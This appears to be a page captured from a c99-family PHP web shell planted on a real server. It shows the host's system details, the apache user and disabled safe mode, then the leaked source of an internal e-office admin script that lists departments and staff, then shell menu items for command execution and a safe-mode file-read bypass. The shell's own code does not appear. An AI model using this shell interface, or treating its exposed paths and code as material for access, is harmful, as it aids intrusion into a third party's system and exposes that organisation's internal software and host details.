Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/directorBCNU/admin/ drwxr-xr-x |
Viewing file: Select action/file-type: <? function ShowDept($deptId){ include_once("../../class/clsConnection.php"); include_once("../../class/clsDB.php"); include_once "../global.php"; include_once "../class/clsTable.php"; include_once "../class/clsDepartment.php"; include_once "../class/clsPerson.php"; include_once "../link/function.php"; include_once "getPrefix.php"; $oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']); $oDP = new Department($oC); $oDP2 = new Department($oC); $oPS = new person($oC); $oDP2->SearchByDeptRef($deptId); $oDP2->GetRecord(); $oPS->SearchByDeptId($oDP2->deptId); while($oPS->GetRecord()){ $GLOBALS["COUNTPS"]++; } if($oDP2->deptRef!="0"){ ShowDept($oDP2->deptRef); } } //ImportPerson function ShowDept2($deptId){ include_once("../../class/clsConnection.php"); include_once("../../class/clsDB.php"); include_once "../global.php"; include_once "../class/clsTable.php"; include_once "../class/clsDepartment.php"; include_once "../class/clsPerson.php"; include_once "../link/function.php"; $oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']); $oDP = new Department($oC); $oDP2 = new Department($oC); $oPS = new person($oC); $oDP2->SearchByDeptRef($deptId); $oDP2->GetRecord(); $oPS->SearchByDeptId($oDP2->deptId); while($oPS->GetRecord()){ $GLOBALS["COUNTP"]++; echo "<tr><td colspan=\"2\" height=\"22\"> "; echo $GLOBALS["COUNTP"].". ".GetPrefix($oPS->prefixId).$oPS->fName." ".$oPS->lName."</td></tr>"; } if($oDP2->deptRef!="0"){ ShowDept2($oDP2->deptRef); } return $GLOBALS["COUNTP"]; } //addWorkGroupPs function ShowDept3($deptId,$deptIdfirst){ include_once("../../class/clsConnection.php"); include_once("../../class/clsDB.php"); include_once "../global.php"; include_once "../class/clsTable.php"; include_once "../class/clsDepartment.php"; include_once "../class/clsPerson.php"; include_once "../link/function.php"; include_once "../class/clsWorkGroup.php"; $oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']); $oDP = new Department($oC); $oDP2 = new Department($oC); $oPS = new person($oC); $oWG = new workGroup($oC); $oWG2 = new workGroup($oC); $oDP2->SearchByDeptRef($deptId); $oDP2->GetRecord(); $oPS->SearchByDeptId($oDP2->deptId); while($oPS->GetRecord()){ $GLOBALS["COUNTP2"]++; if(($GLOBALS["COUNTP2"]%2) == 0) echo "<tr>"; else echo "<tr bgcolor=\"".$GLOBALS["COLOR_BG_TD_16"]."\">"; echo "<td height=\"22\"> "; echo $GLOBALS["COUNTP2"].". ".GetPrefix($oPS->prefixId).$oPS->fName." ".$oPS->lName; echo "<td align=\"center\">"; $countps=$GLOBALS["COUNTP2"]; echo "<input type=\"hidden\" name=\"personId[".$countps."]\" value=\"$oPS->personId\">"; echo "<select name=\"workGpId[".$GLOBALS["COUNTP2"]."]\">"; echo "<option value=\"0\""; if($oPS->workGpId==0) { echo "selected"; } echo ">กำหนดงาน</option>"; $oWG->SearchBydeptId($deptIdfirst); while($oWG->GetRecord()){ echo "<option value=\"$oWG->workGpId\""; if($oPS->workGpId==$oWG->workGpId) { echo "selected"; } echo ">$oWG->workGpName</option>"; } echo "</select></tr>"; } if($oDP2->deptRef!="0"){ ShowDept3($oDP2->deptRef,$deptIdfirst); } return $GLOBALS["COUNTP2"]; } //updatePerson function ShowDept4($deptId,$deptIdfirst){ include_once("../../class/clsConnection.php"); include_once("../../class/clsDB.php"); include_once "../global.php"; include_once "../class/clsTable.php"; include_once "../class/clsDepartment.php"; include_once "../class/clsPerson.php"; include_once "../link/function.php"; include_once "../class/clsWorkGroup.php"; $oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']); $oDP = new Department($oC); $oDP2 = new Department($oC); $oPS = new person($oC); $oWG = new workGroup($oC); $oWG2 = new workGroup($oC); $oWG3 = new workGroup($oC); $oDP2->SearchByDeptRef($deptId); $oDP2->GetRecord(); $oPS->SearchByDeptId($oDP2->deptId); while($oPS->GetRecord()){ $GLOBALS["COUNTP3"]++; echo "<tr><td height=\"22\"> "; echo $GLOBALS["COUNTP3"]." ".GetPrefix($oPS->prefixId).$oPS->fName." ".$oPS->lName."</td>"; $oWG2->SearchBydeptId($deptIdfirst); if($oWG2->GetRecord()=="1"){ $oWG3->SearchByKey($oPS->workGpId); if($oWG3->GetRecord()=="0"){ echo "<td width=\"38%\" align=\"left\"> ยังไม่ระบุงาน</td>"; }else{ echo "<td width=\"38%\" align=\"left\"> งาน$oWG3->workGpName</td>"; } } echo "</tr>"; } if($oDP2->deptRef!="0"){ ShowDept4($oDP2->deptRef,$deptIdfirst); } return $GLOBALS["COUNTP3"]; } // show cout person in dept function CountPsAllDeptRef($deptIdf){ include_once("../../class/clsConnection.php"); include_once("../../class/clsDB.php"); include_once "../global.php"; include_once "../class/clsTable.php"; include_once "../class/clsDepartment.php"; include_once "../class/clsPerson.php"; include_once "../link/function.php"; $oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']); $oDP = new Department($oC); $oDP2 = new Department($oC); $oPS = new person($oC); $oDP->SearchByKey($deptIdf); $oDP->GetRecord(); $GLOBALS["COUNTPS"]=0; $oPS->SearchByDeptId($oDP->deptId); while($oPS->GetRecord()){ $GLOBALS["COUNTPS"]++; } if($oDP->deptRef!="0"){ ShowDept($oDP->deptRef); } return $GLOBALS["COUNTPS"]; } ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0057 ]-- |